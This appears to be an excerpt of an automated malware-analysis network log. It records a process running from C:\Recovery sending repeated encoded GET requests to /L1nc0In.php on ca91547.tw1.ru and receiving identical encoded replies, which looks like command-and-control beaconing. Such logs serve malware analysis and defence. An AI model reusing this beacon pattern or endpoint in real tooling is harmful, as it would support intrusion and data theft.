Dec 15, 2024 00:25:22.997457027 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:25:24.338450909 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50035	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:25:29.467695951 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:25:31.583575010 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50036	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:25:36.714545012 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:25:38.188071012 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50037	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:25:43.323329926 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:25:44.724812984 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50038	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:25:49.855159998 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:25:51.207681894 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50039	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:25:56.342593908 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:25:57.731822014 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50040	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:26:02.860007048 CET	2126	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMk [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:26:04.199723959 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:26:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	50041	92.53.106.114	80

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:26:13.370189905 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:26:14.708265066 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:26:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye
Dec 15, 2024 00:26:19.718617916 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
